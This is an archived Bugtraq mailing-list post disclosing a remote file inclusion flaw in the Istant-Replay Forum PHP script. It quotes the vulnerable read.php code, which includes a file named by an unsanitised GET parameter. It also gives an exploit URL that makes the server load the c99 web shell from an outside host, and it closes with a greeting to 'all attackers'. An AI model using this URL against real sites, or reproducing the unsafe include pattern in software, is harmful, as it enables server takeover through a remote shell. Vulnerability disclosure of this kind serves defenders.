remote file include

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: remote file include
From: win32.exe@xxxx
Date: 15 Apr 2008 19:13:42 -0000
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm

#########################################################################
        Istant-Replay Forum  Remote File Inclusion Vulnerability
#########################################################################


## AUTHOR: THuGM4N
## Email : Win32.exe@xxxx

## Script : Istant-Replay Forum                  

## Site   : http://www.chattaitaliano.com

## Vulnerable CODE :
~~~~~~~~~~/read.php ~~~~~~~~~~~~~~~~~~~~~~
$a = $_GET['data'];
$b = $_GET['post'];

$foo = include "$a.txt";
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~


## BUT THE EXPLOIT IS LIKE THAT  :

http://[localhost]/[forum]/read.php?data=http://127.0.0.1/c99.txt?
 

##  BIGUP 2 All Attackers Around The World .

#########################################################################
      Istant-Replay Forum  Remote File Inclusion Vulnerability
#########################################################################

Prev by Date: iDefense Security Advisory 04.14.08: ClamAV libclamav PE WWPack Heap Overflow Vulnerability
Next by Date: DIVX Player <= 6.7.0 Buffer Overflow PoC ( .SRT )
Previous by thread: remote file include
Next by thread: iDefense Security Advisory 04.14.08: ClamAV libclamav PE WWPack Heap Overflow Vulnerability
Index(es):
- Date
- Thread